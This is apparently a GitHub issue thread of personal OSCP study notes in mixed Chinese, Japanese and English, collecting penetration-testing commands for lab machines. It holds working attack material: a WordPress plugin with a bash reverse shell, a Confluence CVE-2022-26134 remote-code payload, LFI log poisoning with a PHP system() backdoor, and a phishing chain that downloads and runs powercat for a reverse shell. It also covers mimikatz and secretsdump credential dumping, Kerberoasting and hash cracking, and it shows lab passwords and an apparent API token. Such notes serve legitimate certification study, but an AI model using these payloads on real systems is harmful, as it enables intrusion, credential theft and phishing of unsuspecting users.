https://github.com/WDavid404/OSCP/issues/1

[WDavid404]

URL encode / URLEncode

https://www.w3schools.com/tags/ref_urlencode.ASP#:~:text=URLs%20cannot%20contain%20spaces.,(%2B)%20sign%20or%20with%20%20.

space: %20 or a plus (+) sign . : %2E / : %2F

注：URLencode转换时用下面的网页好：https://meyerweb.com/eric/tools/dencoder/

[WDavid404]

wordpress相关

wpscan工具

https://whitemarkn.com/learning-ethical-hacker/wpscan/

wpscan --url http://xxxxxx -e u,t,p

wpscan --url www.yahoo.co.jp
wpscan --url 192.168.194.16

wpscan --url http(s)://www.yoursiteurl.com --enumerate ap  # enumerate all plugins
wpscan --url http(s)://www.yoursiteurl.com --enumerate vp  # only display vulnerable plugins

wpscan --url http(s)://www.yoursiteurl.com -e u # enumerate users

wpscan --url http://alvida-eatery.org --passwords /usr/share/wordlists/rockyou.txt --usernames admin

wpscan --url http://alvida-eatery.org -e u, ap --api-token=vtYOkb3ZEKnydV二VrqFxsZ1teXsWYkiveX巴xWGCgYMo #这样才能报告出更多的问题

wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
==>  搜索plugin和theme上的脆弱性

wordpress plugin reverse shell

https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell

1. 做一个php文件（reversh-plugin.php）

   
   <?php

/**

• Plugin Name: Reverse Shell Plugin
• Plugin URI:
• Description: Reverse Shell Plugin
• Version: 1.0
• Author: Vince Matteo
• Author URI: http://www.sevenlayers.com */

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.xx/443 0>&1'"); ?>

2. zip这个文件：  `zip reversh-plugin.zip ./reversh-plugin.php`
3. upload到wordpress的plugin里，然后active它 （同时在attack machine上利用nc接收reverse shell的请求）
![image](https://github.com/WDavid404/OSCP/assets/137129330/2aaa4b85-7a03-42ca-85de-89aa7f263c00)

[WDavid404]

查找、搜索

grep在当前目录下搜索所有包含key word的文件

recursively grep all directories and subdirectories:

grep -rnH "password" .  

-rnH: These are options or flags used with the grep command:
-r (or --recursive): Searches recursively through directories and their subdirectories for the specified pattern.
-n (or --line-number): Displays the line numbers along with the lines that contain the matched pattern.
-H (or --with-filename): Displays the file name where the match is found along with the matching line.

使用find命令查找flag文件的位置

find / -type f -name flag* 2>/dev/null

case: narrow down which .dat files had “SHA” string in them for a hash: --> find /opt/ofbiz/runtime/data/derby/ofbiz/seg0 -type f -name “*.dat” -exec grep “SHA” {} \;

Powershell去查找文件

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

[WDavid404]

发送邮件 sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com -ap --attach config.Library-ms --server 192.168.208.199 --body body.txt --header "Subject: Problems" --suppress-data

[WDavid404]

Exploit DB

Exploit Database (https://www.exploit-db.com/)

update exploitdb package: sudo apt update && sudo apt install exploitdb The above command updates the local copy of the Exploit Database archive under /usr/share/exploitdb/.

searchsploit

searchsploit remote smb microsoft windows

[WDavid404]

gcc for c code

On Attack machine

$ gcc ofs.c -o ofs  # target machine is Linux OS
$ python3 -m http.server 9000

On target machine

$ cd /tmp/
$ wget <IP>:9000/ofs
$ chmod +x ofs
$ ./ofs

Error：GLIBC_2.33' not found (required by ./exploit-1)

this missing symbol usualy means ur kali glibc is newer than the target machine. if u can compile it on target machine it will usually works, otherwise u can try compile it with static libarary, i.e, gcc -static your_program.c -o your_program

cross-platform compile （混合编译）

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

[WDavid404]

SSH

kali@kali:~/passwordattacks$ chmod 600 id_rsa
kali@kali:~/passwordattacks$ ssh -i id_rsa -p 2222 dave@192.168.50.201

sudo ssh -i tom_key -oHostKeyAlgorithms=+ssh-dss tom@192.168.227.107

//如果ssh login后遇到error：rbash: cd: restricted，可以使用-t "bash --noprofile"重新ssh login
sudo ssh -i tom_key -oHostKeyAlgorithms=+ssh-dss tom@192.168.227.107 -t "bash --noprofile"

取得ssh private key的路径位置

/home/<user>/.ssh/id_rsa 利用dictonary travesal时可以直接去查看上面的文件内容（特别是有的时候 无法远程使用ls命令等的时候）

有了某个user的private key，我们就可以以他的名义来login SSH server

kali@kali:~/beyond/websrv1$ chmod 600 id_rsa

kali@kali:~/beyond/websrv1$ ssh -i id_rsa daniela@192.168.50.244

注意：如果被要求“Enter passphrase for key 'id_rsa'”，可以用ssh2john工具破解passphrase

ssh2john id_rsa > ssh.hash
kali@kali:~/beyond/websrv1$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash

https://github.com/WDavid404/OSCP/issues/16#issuecomment-1891230625

遇到下面问题时

A：可以清空 ~/.ssh/known_hosts文件内容 更好的是： ssh-keygen -R example.com 但是有的时候不起作用 （https://qiita.com/hnw/items/0eeee62ce403b8d6a23c）

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
**:**:**:**:**:**:**:**:**:**:**:**:**:**:**:**.
Please contact your system administrator.
Add correct host key in /Users/hnw/.ssh/known_hosts to get rid of this message.
Offending RSA key in /Users/hnw/.ssh/known_hosts:133
RSA host key for example.com has changed and you have requested strict checking.
Host key verification failed.

创建ssh通道

Kali:
$ ssh-keygen

$ ls
`id_rsa  id_rsa.pub`

$ cat id_rsa.pub
`ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali`

Target:
`dev@oscp:~$ mkdir /home/dev/.ssh`

`dev@oscp:~$ echo "ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali" > /home/dev/.ssh/authorized_keys`

dev@oscp:~$ cat /home/dev/.ssh/authorized_keys
`ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali`

Back on kali:
`ssh -i id_rsa dev@192.168.XXX.150`

Then，you can setup the forward with ssh as follows 
 ssh -i id_rsa dev@192.168.xxx.150 -L 8000:127.0.0.1:8000 

At this point you should have the access to port 8000, locally on kali at 127.0.0.1:8000
确认其是否work： nmap -p8000 127.0.0.1
注意，用web browser或curl访问127.0.0.1:8000不一定会得到结果，因为server端后台未必是在运行web service。

[WDavid404]

Password attack

https://github.com/WDavid404/Note_tryhackme/issues/6 https://github.com/WDavid404/OSCP/issues/16

good hash crack webpage:

https://crackstation.net/

https://gchq.github.io/CyberChef/

---

Confluence issue （CVE-2022-26134）

curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

config file cat /var/atlassian/application-data/confluence/confluence.cfg.xml

hashcat mode

Atlassian hash

The Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes is 12001, hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

AS-REP Roasting

Do not require Kerberos preauthentication is enabled

impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
hashcat -m 18200 <hashfile> <Wordlists> -r <rule> --force

Kerberoasting

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
hashcat -m 13100 <hashfile> <Wordlists> -r <rule> --force

mimikatz or NTLM

privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /user:<Domain\<TargetUsername>
hashcat -m 1000 <hashfile> <Wordlists> -r <rule> --force

zip2john

zip2johnコマンドにてzipファイルから（Johnが解析できる形式の）ハッシュ値を生成して、hash.txtに保存します。

zip2john /path/to/your/protected.zip > ziphash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt

//for multiple zip files
#!/bin/bash

# Loop through each zip file in the current directory
for file in *.zip; do
        sudo zip2john "$file" > "${file%.zip}.hash"
done

john --wordlist=/usr/share/wordlists/rockyou.txt *.hash

[WDavid404]

postgres sql

psql -h 192.168.50.63 -p 2345 -U postgres

postgres=# \l --》 list databases

postgres=# \c <DB name> --> connect to the database e.g. postgres=# \c confluence

confluence=# select * from cwd_user;

[WDavid404]

http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log --> if access.log shows that the User Agent is included in the log entry, we canmodify the User Agent to include the PHP code snippet <?php echo system($_GET['cmd']); ?> ==> curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log*&cmd=ps and more reverse shell code.. see https://github.com/WDavid404/OSCP/issues/10

curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"

"&&whoami" 'or order by 5--//

[WDavid404]

Tools

• linux-kenel-exploit: https://github.com/SecWiki/linux-kernel-exploits

• https://github.com/blankshiro/OSCP-Tools

• PowerView.ps1: /usr/share/windows-resources/powersploit/Recon/PowerView.ps1

• mimikatz.exe: /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

• Bloodhound: sudo apt update && sudo apt install -y bloodhound

• Sharphound： https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

• WinPEAR.exe: Installation on Kali: sudo apt install peass then, cp /usr/share/peass/winpeas/winPEASx64.exe .

• linpeas.sh: wget -qc https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.s

• WindowsEnum: https://github.com/absolomb/WindowsEnum

• AutoRecon： https://github.com/Tib3rius/AutoRecon --> But AutoRecon sometimes miss some ports, so you need to use nmap to scan manually.

e.g 
python3 autorecon.py 192.168.1.100 192.168.1.1/30 localhost 
python3 autorecon.py -ct 2 -cs 2 -vv -o outputdir 192.168.1.100 192.168.1.1/30 localhost -vv

# When you want to use sudo
sudo env "PATH=$PATH" autorecon 192.168.1.100

[WDavid404]

AD

mimikatz.exe

powershell -ep bypass
mimikatz #privilege::debug
mimikatz #sekurlsa::logonpasswords

mimikatz #token::elevate ## to elevate to SYSTEM user privileges.
mimikatz #lsadump::sam

#### online command
 .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
 .\mimikatz.exe "token::elevate" "lsadump::sam" "exit"

### dcsync
mimikatz # lsadump::dcsync /user:corp\Administrator
mimikatz # lsadump::dcsync /user:corp\<username>

netexec

https://www.netexec.wiki/ netexec 192.168.1.0-28 10.0.0.1-67 netexec <target(s)> -u username -p password --continue-on-success netexec <target(s)> -u username -p password --local-auth netexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords netexec <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

crackmapexec (replaced by netexec)

crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares proxychains -q crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares crackmapexec smb <I.P address/subnet> -u -d -H

impacket-psexec

impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 impacket-psexec relia/administrator:"vau!XCKjNQBv2$"@192.168.246.189

impacket-GetNPUsers

proxychains impacket-GetNPUsers -dc-ip 172.16.193.10 -request -outputfile hashes.asreproast medtech.com/joe:password

find GetNPUsers.py in Kali

locate GetNPUsers.py

secrets-dump

impacket-secretsdump example.local/username:password@<target-ip>

# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
//ntds.bak and system.back is donwload from the target machine.

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

[WDavid404]

chisel

[Kali] 下载chisel到目前目录 （https://github.com/jpillora/chisel/releases/tag/v1.9.1，下载windows amd64那个 和 linux的） chmod a+x chisel ./chisel server -p 8000 --reverse

[Victim] iwr -uri http://192.168.45.152/chisel.exe -Outfile chisel.exe .\chisel client 192.168.45.152:8000 R:1080:socks

[WDavid404]

/etc/hosts

add ip and domain name to /etc/hosts: sudo vi /etc/hosts

[WDavid404]

phishing email

1. 准备一个webdav server

   
   kali@kali:~$ mkdir /home/kali/pen-200/webdav
   kali@kali:~$ wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/pen-200/webdav/

血泪教训： webdav的端口必须用80，否则后面动作会不成功！

2. 登陆一台WindowsPC来制作Windows Lib文件（config.Library-ms）和shortcut文件
Connect WINPREP via RDP as offsec with a password of lab in order to prepare the Windows Library and shortcut files.

<?xml version="1.0" encoding="UTF-8"?>

@windows.storage.dll,-34582 6 true imageres.dll,-1003 {7d49d726-3c21-4f05-99aa-fdc2c9474656} true false http://192.168.45.204 ==》！！注意这里的IP和port

注意：config.Library-ms文件保存到kali后里面内容会变，要注意手动恢复回来。

在WinPC的桌面上新建一个shortcut（名字为configuration等都可以）
shorcut内容指定为如下，然后把shorcut拷贝到Kali的webdav里（双击config文件，也就指向了webdav目录里）

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:9000/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"

--》即将会从kali的9000 port（对应http.server的port）里下载一个powercat.ps文件并通过执行它向kali的4444 port发送reverse shell信息

在Kali上准备好
- webdav目录下放置powercat.ps1 文件(/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1)
_血泪注意: 网上下载的powercat.ps1不好用，还是在kali里搜索吧： find / -name powercat.ps1 2>/dev/null_
- 在webdav目录里 python3 -m http.server 9000
- nc -lvp 4444
- body.txt文件，内容任意。

then, 

kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

--server 指定的是MAILSRV的地址

--ap to enable password authentication (没有--ap的话不行，nc接收不到reverse信息)

Username: john Password: dqsTwTpZPn#nL === Trying 192.168.50.242:25... === Connected to 192.168.50.242. <- 220 MAILSRV1 ESMTP -> EHLO kali <- 250-MAILSRV1 <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> am9obg== <- 334 UGFzc3dvcmQ6 -> ZHFzVHdUcFpQbiNuTA== <- 235 authenticated. -> MAIL FROM:john@beyond.com <- 250 OK -> RCPT TO:marcus@beyond.com <- 250 OK -> DATA <- 354 OK, send. -> 36 lines sent <- 250 Queued (1.088 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host.

nc上会收到一个internal pc（CLIENTWK1）来的reverse shell （IP：172.16.74.243）

[WDavid404]

chromium --enable-chrome-browser-cloud-management

[WDavid404]

--

[WDavid404]

Potato

./GodPotato-NET4.exe -cmd "C:\Users\adrian\nc64.exe -e c:\windows\system32\cmd.exe 192.168.45.243 4445"

[WDavid404]

Mysql

https://dev.mysql.com/doc/refman/8.0/en/connecting.html

mysql --host=localhost --user=myname --password=password mydb
mysql -h localhost -u myname -ppassword mydb
mysql --host=localhost --user=myname --password mydb
mysql -h localhost -u myname -p mydb

[WDavid404]

pspy

https://github.com/DominicBreuker/pspy

target$ timeout 5m ./pspy64 This will run the pspy executable and then terminate it automatically after 5 minutes. Can do with seconds too, e.g. 180s.

[WDavid404]

解凍 (extract)

unzip xxxx.zip unzip -P your-password zipfile.zip 7z x test.7z -ppassword tar -zxvf xxxx.tar.gz

圧縮

tar -zcvf xxxx.tar.gz directory zip -r xxxx.zip directory

[WDavid404]

SNMP

https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

snmpwalk -v 2c -c public 192.168.190.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull snmpbulkwalk -c public -v2c 192.168.182.149 . --》 里面包含的信息比autorecon的多。。比如password

[WDavid404]

start / stop a service

sc.exe start "service name"
sc.exe stop "service name"
PS> Start-Service -Name "ServiceName"
PS> Restart-Service -Name "ServiceName"
get-service "ServiceName" | stop-service -WhatIf

[WDavid404]

get PDF info

exiftool -a -u PDF_NAME.pdf

[WDavid404]

Finding all important files in Windows:(CTF Style)

cd c:\Users then tree /F

show hidden file via powershell

ls -Force
dir -force

[WDavid404]

winpeas

Where are my COLORS?!?!?!

https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md The ouput will be colored using ansi colors. If you are executing winpeas.exe from a Windows console, you need to set a registry value to see the colors (and open a new CMD):

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 Below you have some indications about what does each color means exacty, but keep in mind that Red is for something interesting (from a pentester perspective) and Green is something well configured (from a defender perspective).

[WDavid404]

生成一个user的hash

openssl passwd xxxx 或者

openssl passwd -1 -salt xxxxxxxx password
---》
  $1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.

### options：
Cryptographic options:
 -salt val           Use provided salt
 -6                  SHA512-based password algorithm
 -5                  SHA256-based password algorithm
 -apr1               MD5-based password algorithm, Apache variant
 -1                  MD5-based password algorithm
 -aixmd5             AIX MD5-based password algorithm

---》 https://github.com/WDavid404/Note_tryhackme/issues/2

[WDavid404]

command injection list

https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet

[WDavid404]

cewl：Custom Word List generator

https://www.kali.org/tools/cewl/ cewl -d 2 -m 5 -w docswords.txt https://example.com

[WDavid404]

decode base64：

cat secret.txt | base64 -d

[WDavid404]

install metasploit framework in kali

sudo apt-get update
sudo apt-get install metasploit-framework